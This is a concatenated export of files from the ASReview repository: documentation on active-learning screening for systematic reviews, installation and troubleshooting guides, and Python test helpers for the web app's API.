youtube:: k-a2SCq-LtA\n\nWhat is active learning?\n------------------------\n\nArtificial Intelligence (AI) and machine learning have allowed the development\nof AI-aided pipelines that assist in finding relevant texts for search tasks.\nA well-established approach to increasing the efficiency\nof screening large amounts of textual data is screening prioritization through\n`Active Learning <https://asreview.ai/blog/active-learning-explained/>`_: a constant\ninteraction between a human who labels records and a machine learning model\nwhich selects the most likely relevant record based on a minimal training\ndataset. The active learning cycle is repeated until the annotator is sufficiently\nconfident they have seen all relevant records. Thus, the machine learning model is\nresponsible for ranking the records and the human provides the labels; this is called\n`Researcher-In-The-Loop (RITL) <https://asreview.ai/blog/active-learning-explained/>`_.\n\nIt allows the screening of large amounts of text in an intelligent\nand time-efficient manner. ASReview LAB, published in Nature Machine\nIntelligence, has shown the benefits of active learning, `reducing up to 95%\n<https://www.nature.com/articles/s42256-020-00287-7>`_ of the required\nscreening time.\n\n\nLabeling workflow with ASReview\n-------------------------------\n\nStart and finish a systematic labeling process with ASReview LAB by following\nthese steps:\n\n1. Create a dataset with potentially relevant records you want to screen systematically. Improve the `quality of the data <https://www.asreview.ai/blog/the-importance-of-abstracts>`__ and specify clear reviewing (inclusion/exclusion) criteria\n2. Specify a `stopping criterion <https://www.github.com/asreview/asreview/discussions/557>`__\n3. :doc:`start`\n4. :doc:`project_create`\n5. :ref:`Import your dataset <project_create:Add dataset>`\n6. :ref:`project_create:Select Prior Knowledge`\n7. Select the four components of the :ref:`Active learning model <project_create:Model>` (feature extractor, classifier, balancing method, query strategy)\n8. Wait until the warm-up of the AI is finished (the software extracts the features and trains the classifier on the prior knowledge)\n9. Start :doc:`screening` until you reach your `stopping criterion <https://www.github.com/asreview/asreview/discussions/557>`__\n10. At any time, you can export the :term:`dataset` with the labeling decisions, or the entire :term:`project`.\n\n\nQuick start\n-----------\n\n1. Check if Python 3.8 or later is installed (if not, `install Python <https://www.python.org/downloads>`__)\n\n.. code:: bash\n\n python --version\n\n2. Install ASReview LAB\n\n.. code:: bash\n\n pip install asreview\n\n3. Open ASReview LAB\n\n.. code:: bash\n\n asreview lab\n\n4. Click *Create* to create a project\n\n5. Select a mode (Oracle, Exploration, Simulation)\n\n6. Name the project, and if you want, add author name(s) and type a description\n\n7. Import a dataset you want to review, or select a benchmark dataset (only available for the Exploration and Simulation mode)\n\n8. Add prior knowledge. Select at least 1 relevant and 1 irrelevant record to warm up the AI. You can search for a specific record or request random records\n\n9. Select the four components of the active learning model, or rely on the default settings that have shown fast and excellent performance in many simulation studies\n\n10. ASReview LAB starts extracting the features and runs the classifier with the prior knowledge\n\nYou’re ready to start labeling your data! 
All your labeling actions are\nautomatically saved, so there is no need to click the save button (we don’t\neven have one).\n\n\n\nASReview LAB terminology\n------------------------\n\nWhen you do text screening for a systematic review in ASReview LAB, it can be\nhelpful to understand some basic concepts about systematic reviewing and machine\nlearning. The following overview describes some terms you might\nencounter as you use ASReview LAB.\n\n.. glossary::\n\n Active learning model\n An active learning model is the combination of four elements: a feature\n extraction technique, a classifier, a balance strategy, and a query strategy.\n\n ASReview\n ASReview stands for *Active learning for Systematic Reviews* or\n *AI-assisted Systematic Reviews*, depending on context. Avoid this\n explanation, only use as tagline.\n\n ASReview CLI\n ASReview CLI is the command line interface that is developed for advanced\n options or for running simulation studies.\n\n Data\n Data includes :term:`dataset`, prior knowledge, labels, and\n :term:`notes<note>`.\n\n Dataset\n A dataset is the collection of :term:`records<record>` that the :term:`user`\n :term:`imports<import>` and :term:`exports<export>`.\n\n ELAS\n ELAS stands for \"Electronic Learning Assistant\". It is the name of the\n :term:`ASReview` mascot. It is used for storytelling and to increase\n explainability.\n\n Export\n Export is the action of exporting a :term:`dataset` or a :term:`project`\n from ASReview LAB.\n\n Extension\n An extension is an additional element to ASReview LAB, such as\n the `ASReview Datatools <https://github.com/asreview/asreview-datatools>`__\n extension.\n\n Import\n Import is the action of importing a :term:`dataset` or a :term:`project`\n into ASReview LAB.\n\n Model configuration\n Model configuration is the action of the :term:`user` to configure the\n :term:`active learning model`.\n\n Note\n A note is the information added by the :term:`user` in the note field and\n stored in the :term:`project file`. It can be edited on the History page.\n\n Project\n A project is a project created in ASReview LAB.\n\n Projects dashboard\n The projects dashboard is the landing page containing an overview of all\n :term:`projects<project>` in ASReview LAB.\n\n Project file\n The project file is the ``.asreview`` file containing the :term:`data` and\n :term:`model configuration`. The file is :term:`exported<export>` from\n ASReview LAB and can be :term:`imported<import>` back.\n\n Project mode\n The project mode includes oracle, simulation, and exploration in\n ASReview LAB:\n\n **Oracle** mode is used when a :term:`user` reviews a :term:`dataset`\n systematically with interactive artificial intelligence (AI).\n\n **Exploration** mode is used when a user explores or demonstrates ASReview\n LAB with a completely labeled dataset. 
This mode is suitable for teaching\n purposes.\n\n **Simulation** mode is used when a user simulates a review on a completely\n labeled dataset to see the performance of ASReview LAB.\n\n Status\n The project status is the stage that a :term:`project` is at in\n ASReview LAB.\n\n **Setup** refers to the fact that the :term:`user` adds project information,\n :term:`imports<import>` the :term:`dataset`, selects the prior knowledge,\n :term:`configures the model<Model configuration>` and initiates the first\n iteration of :term:`model<Active learning model>` training.\n\n **In Review** refers to the fact that in oracle or exploration mode,\n the user adds labels to :term:`records<record>`, or in simulation mode, the\n simulation is running.\n\n **Finished** refers to the fact that in oracle or exploration mode, the user\n decides to complete the :term:`reviewing` process or has labeled all the\n records, or in simulation mode, the simulation has been completed.\n\n **Published** refers to the fact that the user publishes the dataset and\n :term:`project file` in a repository, preferably with a Digital Object\n Identifier (DOI).\n\n Record\n A record is the data point that needs to be labeled. A record can contain\n both information that is used for training the\n :term:`active learning model`, and information that is not used for this\n purpose.\n\n In the case of systematic reviewing, a record is meta-data for a scientific\n publication. Here, the information that is used for training purposes is\n the text in the title and abstract of the publication. The information that\n is not used for training typically consists of other metadata, for example,\n the authors, journal, or DOI of the publication.\n\n Reviewing\n Reviewing is the decision-making process on the relevance of\n :term:`records<record>` (“irrelevant” or “relevant”). It is interchangeable\n with Labeling, Screening, and Classifying.\n\n User\n The human annotator is the person who labels :term:`records<record>`.\n\n Screener\n Replacement term when the context is PRISMA-based reviewing.\n\n\n\nKey principles\n--------------\n\nThe use of ASReview LAB comes with `five fundamental principles\n<https://asreview.ai/blog/the-zen-of-elas/>`_:\n\n1. Humans are the oracle;\n2. Code is open & results are transparent;\n3. Decisions are unbiased;\n4. The interface shows an AI is at work;\n5. Users are responsible for importing high quality data.\n\n\nPrivacy\n-------\n\nThe ASReview LAB software doesn't collect any information about the usage or\nits user. 
Great, isn't it!\n" }, { "alpha_fraction": 0.761904776096344, "alphanum_fraction": 0.761904776096344, "avg_line_length": 62, "blob_id": "43c73b1e664b22163201cda16cef57ee08a4504a", "content_id": "532e4aa0e9280da5ce99e54e08cb0a1b4756a0db", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 441, "license_type": "permissive", "max_line_length": 70, "num_lines": 7, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as AcceptanceDialog } from \"./AcceptanceDialog\";\nexport { default as ConfirmationDialog } from \"./ConfirmationDialog\";\nexport { default as EndCollaboration } from \"./EndCollaboration\";\nexport { default as DialogHeader } from \"./DialogHeader\";\nexport { default as InvitationContents } from \"./InvitationComponent\";\nexport { default as TeamPage } from \"./TeamPage\";\nexport { default as UserListEntry } from \"./UserListEntry\";\n" }, { "alpha_fraction": 0.6519800424575806, "alphanum_fraction": 0.6527668237686157, "avg_line_length": 29.261905670166016, "blob_id": "a5b24ddaa39033ccd538c5008648b285e3837714", "content_id": "58b1aed401a57557334059d82b49652c52215eb6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3813, "license_type": "permissive", "max_line_length": 88, "num_lines": 126, "path": "/asreview/webapp/tests/utils/misc.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import io\nimport json\nimport random\nimport re\nfrom pathlib import Path\nfrom typing import Union\nfrom urllib.request import urlopen\n\nimport requests\nfrom flask import current_app\n\nfrom asreview.project import ASReviewProject\nfrom asreview.utils import asreview_path\n\n\ndef current_app_is_authenticated():\n return current_app.config.get(\"AUTHENTICATION_ENABLED\")\n\n\ndef get_project_id(project):\n \"\"\"Get a project id from either a Project model\n (authenticated app) or an ASReviewProject object\n (unauthenticated app).\"\"\"\n id = None\n if current_app_is_authenticated():\n id = project.project_id\n else:\n id = project.config[\"id\"]\n return id\n\n\ndef read_project_file(project):\n \"\"\"Loads the data from the project.json file.\"\"\"\n id = get_project_id(project)\n with open(asreview_path() / id / \"project.json\", \"r\") as f:\n data = json.load(f)\n return data\n\n\ndef manipulate_project_file(project, key, value):\n \"\"\"Updates key value pairs in the project.json file.\"\"\"\n id = get_project_id(project)\n data = read_project_file(project)\n data[key] = value\n with open(asreview_path() / id / \"project.json\", \"w+\") as f:\n json.dump(data, f)\n return True\n return False\n\n\ndef _extract_stem(path: Union[str, Path]):\n \"\"\"Extracts a stem from a path or URL containing a filename.\"\"\"\n return Path(re.split(\":|/\", str(path))[-1]).stem\n\n\ndef extract_filename_stem(upload_data):\n \"\"\"Helper function to get the stem part of a filename from a\n Path or URL contaning a filename.\"\"\"\n # upload data is a dict with a single key value pair\n value = list(upload_data.values())[0]\n # split this value on either / or :\n return _extract_stem(value)\n\n\ndef choose_project_algorithms():\n \"\"\"Randomly chooses a model plus the appropriate feature\n extraction, query strategy and balance strategy.\"\"\"\n model = random.choice([\"svm\", \"nb\", \"logistic\"])\n feature_extraction = 
random.choice([\"tfidf\"])\n data = {\n \"model\": model,\n \"feature_extraction\": feature_extraction,\n \"query_strategy\": random.choice(\n [\"cluster\", \"max\", \"max_random\", \"max_uncertainty\", \"random\", \"uncertainty\"]\n ),\n \"balance_strategy\": random.choice([\"double\", \"simple\", \"undersample\"]),\n }\n return data\n\n\ndef retrieve_project_url_github(version=None):\n \"\"\"Retrieve .asreview file(s) url from asreview-project-files-testing\n GitHub repository. When version is not None, the function returns\n a single URL, otherwise a list containing URLs.\"\"\"\n\n repo = \"asreview/asreview-project-files-testing\"\n repo_api_url = f\"https://api.github.com/repos/{repo}/git/trees/master\"\n repo_url = f\"https://github.com/{repo}/blob/master\"\n file_type = \"startreview.asreview?raw=true\"\n\n json_file = json.loads(urlopen(repo_api_url).read().decode(\"utf-8\"))[\"tree\"]\n\n version_tags = []\n project_urls = []\n\n for file in json_file:\n if file[\"type\"] == \"tree\":\n version_tags.append(file[\"path\"])\n\n for tag in version_tags:\n file_version = f\"/{tag}/asreview-project-{tag.replace('.', '-')}-\"\n url = repo_url + file_version + file_type\n\n if version is None:\n project_urls.append(url)\n else:\n return url\n\n return project_urls\n\n\ndef copy_github_project_into_asreview_folder(url):\n \"\"\"This function copies an ASReview project stored on GitHub\n into the asreview folder.\"\"\"\n response = requests.get(url)\n return ASReviewProject.load(\n io.BytesIO(response.content),\n asreview_path(),\n safe_import=True\n )\n\n\ndef get_folders_in_asreview_path():\n \"\"\"This function returns the folders located\n in the asreview folder.\"\"\"\n return [f for f in asreview_path().glob(\"*\") if f.is_dir()]\n" }, { "alpha_fraction": 0.730869710445404, "alphanum_fraction": 0.7316162586212158, "avg_line_length": 28.119565963745117, "blob_id": "cbb68f66979688ee48bb0f69b289752c480bac92", "content_id": "fd70108af1a749bad535b7edb7eba2cc9bc9c05e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2679, "license_type": "permissive", "max_line_length": 110, "num_lines": 92, "path": "/docs/source/troubleshooting.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Troubleshooting\n===============\n\nASReview LAB is advanced machine learning software. In some situations, you\nmight run into unexpected behavior. See below for solutions to\nproblems.\n\nUnknown Command \"pip\"\n---------------------\n\nThe command line returns one of the following messages:\n\n.. code:: bash\n\n -bash: pip: No such file or directory\n\n.. code:: bash\n\n 'pip' is not recognized as an internal or external command, operable program or batch file.\n\n\nFirst, check if Python is installed with the following command:\n\n.. code:: bash\n\n python --version\n\nIf this doesn't return 3.8 or higher, then Python isn't installed or isn't\ninstalled correctly.\n\nMost likely, the environment variables aren't configured correctly. Follow\nthe step-by-step installation instructions on the ASReview website (`Windows <https://asreview.ai/download/>`__\nand `MacOS <https://asreview.ai/download/>`__).\n\nHowever, there is a simple way to work around incorrectly configured environment\nvariables by adding `python -m` in front of the command. For example:\n\n.. 
code:: bash\n\n python -m pip install asreview\n\n\nUnknown command \"asreview\"\n--------------------------\n\nIn some situations, the entry point \"asreview\" cannot be found after installation.\nFirst, check whether the package is correctly installed. Do this with the command\n`python -m asreview -h`. If this shows a description of the program, use\n`python -m` in front of all your commands. For example:\n\n.. code-block:: bash\n\n python -m asreview lab\n\n\nBuild dependencies error\n------------------------\n\nThe command line returns the following message:\n\n.. code:: bash\n\n \"Installing build dependencies ... error\"\n\nThis error typically happens when the version of your Python installation has been\nreleased very recently. Because of this, the dependencies of ASReview are not\ncompatible with your Python installation yet. It is advised to install\nthe second most recent version of Python instead. Detailed step-by-step instructions\nto install Python (and ASReview) are available for\n`Windows <https://asreview.ai/download/>`__ and\n`MacOS <https://asreview.ai/download/>`__ users.\n\nRemove temporary files\n----------------------\n\nIn case ASReview runs into unexpected errors or doesn't work as expected, it\nis advised to try to remove temporary files from the project first. These\nfiles can be found in the ``.asreview/`` folder in your home directory.\nHowever, the easiest way to remove these files is with:\n\n.. code:: bash\n\n asreview lab --clean-all-projects\n\nThis will safely remove temporary files; nothing will harm your review. To\nclean a specific project, use\n\n.. code:: bash\n\n asreview lab --clean-project my-project\n\nin which ``my-project`` is your project name.\n" }, { "alpha_fraction": 0.6899551749229431, "alphanum_fraction": 0.7092011570930481, "avg_line_length": 24.62837791442871, "blob_id": "fda2add5dabd1f3beb4d68effd22552690a93f4d", "content_id": "830cbdb41a881c2c51f7347000806024f86a854b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3793, "license_type": "permissive", "max_line_length": 171, "num_lines": 148, "path": "/docs/source/installation.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Installation\n============\n\nInstall ASReview\n----------------\n\nASReview software requires an installation of Python 3.8 or later. Detailed\nstep-by-step instructions to install Python (and ASReview) are available for\n`Windows <https://asreview.ai/download>`__ and\n`macOS/Linux <https://asreview.ai/download/>`__ users.\n\nInstall the ASReview software with Pip by running the following command in the\n`CMD.exe` (Windows) or `Terminal` (MacOS/Linux):\n\n.. code:: bash\n\n pip install asreview\n\nStart the application with the following command (in CMD.exe or Terminal):\n\n.. code:: bash\n\n asreview lab\n\nThe ASReview LAB software starts in the browser. For more options on starting\nASReview LAB, see :doc:`start`.\n\n.. note::\n\n See :doc:`troubleshooting` for common problems during installation.\n\n.. tip::\n\n For users with Apple M1 computers, if you experience problems, follow the\n `instructions\n <https://github.com/asreview/asreview/issues/738#issuecomment-919685562>`__.\n\n\nUpgrade ASReview\n----------------\n\nUpgrade ASReview software with\n\n.. code:: bash\n\n pip install --upgrade asreview\n\n\n\nUninstall ASReview\n------------------\n\nRemove ASReview with\n\n.. code:: bash\n\n pip uninstall asreview\n\nEnter ``y`` to confirm.\n\n.. 
warning::\n\n Note that your project files will **not** be deleted by this action. You can find them in the `.asreview` folder in your home directory.\n\nServer Installation\n-------------------\n\nIt is possible to run the ASReview software on a server or custom domain. Use\nthe flags `--ip` and `--port` for configuration. ASReview should only be used in\nclosed networks.\n\n.. code:: bash\n\n asreview lab --port 5555 --ip xxx.x.x.xx\n\n.. warning::\n\n Don't use the development server in production. Read the Flask documentation\n about `deploying a Flask app to production <https://flask.palletsprojects.com/en/1.1.x/tutorial/deploy/>`__.\n\n\nInstall with Docker\n-------------------\n\nASReview is also available as a Docker container. Make sure you have\nDocker installed on your machine.\n\nTo install and start ASReview LAB at http://localhost:5000, run the following:\n\n.. code:: bash\n\n docker run -p 5000:5000 ghcr.io/asreview/asreview:latest lab\n\n\nMore advanced command line options can be given\nafterward, like this:\n\n.. code:: bash\n\n docker run -p 9000:9000 ghcr.io/asreview/asreview lab --port 9000\n\n.. tip::\n\n ASReview LAB is now installed. Open the URL in your host web browser:\n ``http://localhost:5000`` and get started.\n\n\nMount local volume\n~~~~~~~~~~~~~~~~~~\n\nTo mount the container to your local project folder (or any other local\nfolder), the `-v` flag can be used. To do so, adjust path-to-your-folder to\nyour local folder. When a project folder is specified, ASReview LAB will store\nand load all its projects from this folder. Note that multiple containers can\naccess the same folder.\n\n.. code:: bash\n\n docker run -p 5000:5000 -v path-to-your-folder:/project_folder ghcr.io/asreview/asreview lab\n\nNamed container\n~~~~~~~~~~~~~~~\n\nTo make the usage easier, you can create a named container like the following:\n\n.. code:: bash\n\n docker create --name asreview-lab -p 5000:5000 -v path-to-your-folder:/project_folder ghcr.io/asreview/asreview lab\n\nTo start the container, enter:\n\n.. code:: bash\n\n docker start asreview-lab\n\nTo stop it, just use `stop` instead of `start`.\nYou can also check which containers are running with `docker ps`.\n\nCustomize the image\n~~~~~~~~~~~~~~~~~~~\n\nIf you want to add more extensions, or build the Docker image yourself, check the file `Dockerfile <https://github.com/asreview/asreview/tree/master/Dockerfiles>`__.\nModify it as you see fit, and then build and run the image with:\n\n.. 
code:: bash\n\n docker build -t ghcr.io/asreview/asreview:custom .\n docker run -p 5000:5000 ghcr.io/asreview/asreview:custom lab\n" }, { "alpha_fraction": 0.667323112487793, "alphanum_fraction": 0.6679291129112244, "avg_line_length": 27.330472946166992, "blob_id": "deb24cacc8e6dae716e23a91bccb4f384a5a36f6", "content_id": "af3ce1991fc9e3f4d238f8af8a6a3e61118f1fc9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13202, "license_type": "permissive", "max_line_length": 87, "num_lines": 466, "path": "/asreview/webapp/tests/utils/api_utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import random\nimport time\nfrom io import BytesIO\nfrom typing import Union\nfrom urllib.request import urlopen\n\nfrom flask.testing import FlaskClient\n\nimport asreview.webapp.tests.utils.crud as crud\nimport asreview.webapp.tests.utils.misc as misc\nfrom asreview.project import ASReviewProject\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.tests.utils.config_parser import all_users\nfrom asreview.webapp.tests.utils.config_parser import get_user\nfrom asreview.webapp.tests.utils.misc import get_project_id\n\n\ndef process_response(response):\n \"\"\"Breaks a response into a tuple containing the status code\n and json data.\"\"\"\n return (response.status_code, response.json)\n\n\n# ########################\n# General API calls\n# ########################\n\n\ndef call_root_url(client):\n response = client.get(\"/\")\n status_code, data = process_response(response)\n return (status_code, data, response.text)\n\n\ndef call_boot_url(client):\n response = client.get(\"/boot\")\n return process_response(response)\n\n\n# ########################\n# Authentication API calls\n# ########################\n\n\ndef signin_user(client, user):\n \"\"\"Signs in a user through the API\"\"\"\n # If a password is not set, we need to get it\n if not hasattr(user, \"password\"):\n users = all_users()\n user.password = users[user.identifier].password\n # request\n response = client.post(\n \"/auth/signin\", data={\"email\": user.identifier, \"password\": user.password}\n )\n return process_response(response)\n\n\ndef signup_user(client, user):\n \"\"\"Signs up a user through the API\"\"\"\n response = client.post(\n \"/auth/signup\",\n data={\n \"identifier\": user.email,\n \"email\": user.email,\n \"name\": user.name,\n \"password\": user.password,\n \"affiliation\": user.affiliation,\n \"origin\": \"asreview\",\n },\n )\n return process_response(response)\n\n\ndef signout_user(client):\n \"\"\"Sign out user\"\"\"\n response = client.delete(\"/auth/signout\")\n return process_response(response)\n\n\ndef confirm_user(client, user):\n response = client.post(\n \"/auth/confirm_account\", data={\"user_id\": user.id, \"token\": user.token}\n )\n return process_response(response)\n\n\ndef forgot_password(client, user):\n response = client.post(\"/auth/forgot_password\", data={\"email\": user.email})\n return process_response(response)\n\n\ndef reset_password(client, user):\n response = client.post(\n \"/auth/reset_password\",\n data={\"password\": user.password, \"token\": user.token, \"user_id\": user.id},\n )\n return process_response(response)\n\n\ndef update_user(client, data):\n response = client.post(\"/auth/update_profile\", data=data)\n return process_response(response)\n\n\ndef refresh(client):\n response = client.get(\"/auth/refresh\")\n return process_response(response)\n\n\ndef get_profile(client: 
FlaskClient):\n response = client.get(\"/auth/get_profile\")\n return process_response(response)\n\n\n# ########################\n# Teams API calls\n# ########################\n\n\ndef invite(client, project, user):\n url = f\"/api/invitations/projects/{get_project_id(project)}/users/{user.id}\"\n response = client.post(url)\n return process_response(response)\n\n\ndef list_invitations(client):\n response = client.get(\"/api/invitations\")\n return process_response(response)\n\n\ndef list_collaborators(client, project):\n response = client.get(f\"/api/projects/{get_project_id(project)}/users\")\n return process_response(response)\n\n\ndef accept_invitation(client, project):\n response = client.post(\n f\"/api/invitations/projects/{get_project_id(project)}/accept\", data={}\n )\n return process_response(response)\n\n\ndef reject_invitation(client, project):\n response = client.delete(\n f\"/api/invitations/projects/{get_project_id(project)}/reject\", data={}\n )\n return process_response(response)\n\n\ndef delete_invitation(client, project, user):\n response = client.delete(\n f\"/api/invitations/projects/{get_project_id(project)}/users/{user.id}\", data={}\n )\n return process_response(response)\n\n\ndef delete_collaboration(client, project, user):\n response = client.delete(\n f\"/api/projects/{get_project_id(project)}/users/{user.id}\", data={}\n )\n return process_response(response)\n\n\n# ########################\n# Project API calls\n# ########################\n\n\ndef get_all_projects(client: FlaskClient):\n response = client.get(\"/api/projects\")\n return process_response(response)\n\n\ndef create_project(\n client: FlaskClient,\n project_name: str,\n mode: str = \"explore\",\n authors: str = \"authors\",\n description: str = \"description\",\n):\n response = client.post(\n \"/api/projects/info\",\n data={\n \"mode\": mode,\n \"name\": project_name,\n \"authors\": authors,\n \"description\": description,\n },\n )\n return process_response(response)\n\n\ndef create_project_from_dict(client: FlaskClient, data: dict):\n response = client.post(\n \"/api/projects/info\",\n data=data,\n )\n return process_response(response)\n\n\ndef update_project(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n name: str = \"name\",\n mode: str = \"explore\",\n authors: str = \"authors\",\n description: str = \"description\",\n):\n response = client.put(\n f\"/api/projects/{get_project_id(project)}/info\",\n data={\n \"mode\": mode,\n \"name\": name,\n \"authors\": authors,\n \"description\": description,\n },\n )\n return process_response(response)\n\n\ndef upgrade_project(client: FlaskClient, project: Union[Project, ASReviewProject]):\n response = client.get(f\"/api/projects/{get_project_id(project)}/upgrade_if_old\")\n return process_response(response)\n\n\ndef import_project(client: FlaskClient, url: str):\n with urlopen(url) as project_file:\n response = client.post(\n \"/api/projects/import_project\",\n data={\"file\": (BytesIO(project_file.read()), \"project.asreview\")},\n )\n return process_response(response)\n\n\ndef get_project_stats(client: FlaskClient):\n response = client.get(\"/api/projects/stats\")\n return process_response(response)\n\n\ndef get_demo_data(client: FlaskClient, subset: str):\n response = client.get(f\"/api/datasets?subset={subset}\")\n return process_response(response)\n\n\ndef upload_data_to_project(\n client: FlaskClient, project: Union[Project, ASReviewProject], data: dict\n):\n response = client.post(\n 
f\"/api/projects/{get_project_id(project)}/data\",\n data=data,\n )\n return process_response(response)\n\n\ndef get_project_data(client: FlaskClient, project: Union[Project, ASReviewProject]):\n response = client.get(f\"/api/projects/{get_project_id(project)}/data\")\n return process_response(response)\n\n\ndef get_project_dataset_writer(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/dataset_writer\")\n return process_response(response)\n\n\ndef search_project_data(\n client: FlaskClient, project: Union[Project, ASReviewProject], query: str\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/search?q={query}\")\n return process_response(response)\n\n\ndef get_prior_random_project_data(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/prior_random\")\n return process_response(response)\n\n\ndef label_random_project_data_record(\n client: FlaskClient, project: Union[Project, ASReviewProject], label: int\n):\n # get random data\n _, data = get_prior_random_project_data(client, project)\n # select a specific record\n record = random.choice(data[\"result\"])\n doc_id = record[\"id\"]\n return label_project_record(client, project, doc_id, label, note=\"\")\n\n\ndef label_project_record(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n doc_id: int,\n label: str,\n prior: int = 1,\n note: str = \"\",\n):\n response = client.post(\n f\"/api/projects/{get_project_id(project)}/record/{doc_id}\",\n data={\"doc_id\": doc_id, \"label\": label, \"is_prior\": prior, \"note\": note},\n )\n return process_response(response)\n\n\ndef update_label_project_record(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n doc_id: int,\n label: str,\n prior: int = 1,\n note: str = \"\",\n):\n response = client.put(\n f\"/api/projects/{get_project_id(project)}/record/{doc_id}\",\n data={\"doc_id\": doc_id, \"label\": label, \"is_prior\": prior, \"note\": note},\n )\n return process_response(response)\n\n\ndef get_labeled_project_data(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/labeled\")\n return process_response(response)\n\n\ndef get_labeled_project_data_stats(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/labeled_stats\")\n return process_response(response)\n\n\ndef get_project_algorithms_options(client: FlaskClient):\n response = client.get(\"/api/algorithms\")\n return process_response(response)\n\n\ndef set_project_algorithms(\n client: FlaskClient, project: Union[Project, ASReviewProject], data: dict\n):\n response = client.post(\n f\"/api/projects/{get_project_id(project)}/algorithms\", data=data\n )\n return process_response(response)\n\n\ndef get_project_algorithms(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/algorithms\")\n return process_response(response)\n\n\ndef start_project_algorithms(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.post(f\"/api/projects/{get_project_id(project)}/start\")\n return process_response(response)\n\n\ndef get_project_status(client: FlaskClient, project: Union[Project, ASReviewProject]):\n response = 
client.get(f\"/api/projects/{get_project_id(project)}/status\")\n return process_response(response)\n\n\ndef set_project_status(\n client: FlaskClient, project: Union[Project, ASReviewProject], status: str\n):\n response = client.put(\n f\"/api/projects/{get_project_id(project)}/status\", data={\"status\": status}\n )\n return process_response(response)\n\n\ndef export_project_dataset(\n client: FlaskClient, project: Union[Project, ASReviewProject], format: str\n):\n id = get_project_id(project)\n response = client.get(f\"/api/projects/{id}/export_dataset?file_format={format}\")\n return process_response(response)\n\n\ndef export_project(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/export_project\")\n return process_response(response)\n\n\ndef get_project_progress(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/progress\")\n return process_response(response)\n\n\ndef get_project_progress_density(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/progress_density\")\n return process_response(response)\n\n\ndef get_project_progress_recall(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/progress_recall\")\n return process_response(response)\n\n\ndef get_project_current_document(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/get_document\")\n return process_response(response)\n\n\ndef delete_project(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.delete(f\"/api/projects/{get_project_id(project)}/delete\")\n return process_response(response)\n\n\n# ########################\n# General procedures\n# ########################\n\n\ndef create_and_signin_user(client, test_user_id=1):\n \"\"\"Creates a user account and signs in with that account.\"\"\"\n # signup user\n user = get_user(test_user_id)\n signup_user(client, user)\n # refresh user\n stored_user = crud.get_user_by_identifier(user.identifier)\n # signin user\n signin_user(client, user)\n # return the user\n return stored_user\n\n\ndef upload_label_set_and_start_model(client, project, dataset):\n \"\"\"Uploads a dataset to a created project and adds and starts\n a random model.\"\"\"\n # upload dataset\n upload_data_to_project(client, project, data=dataset)\n # label 2 random records\n label_random_project_data_record(client, project, 1)\n label_random_project_data_record(client, project, 0)\n # select a model\n model_data = misc.choose_project_algorithms()\n set_project_algorithms(client, project, data=model_data)\n # start the model\n start_project_algorithms(client, project)\n # make sure model is done\n time.sleep(10)\n" }, { "alpha_fraction": 0.8097826242446899, "alphanum_fraction": 0.8192934989929199, "avg_line_length": 48.06666564941406, "blob_id": "fb3697aa0dfc2a68300e758cf5cd80cc6e6aba84", "content_id": "8571381dcfd828bdf7a1e061ca91144dae9f052e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1472, "license_type": "permissive", "max_line_length": 74, "num_lines": 30, "path": "/asreview/models/classifiers/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": 
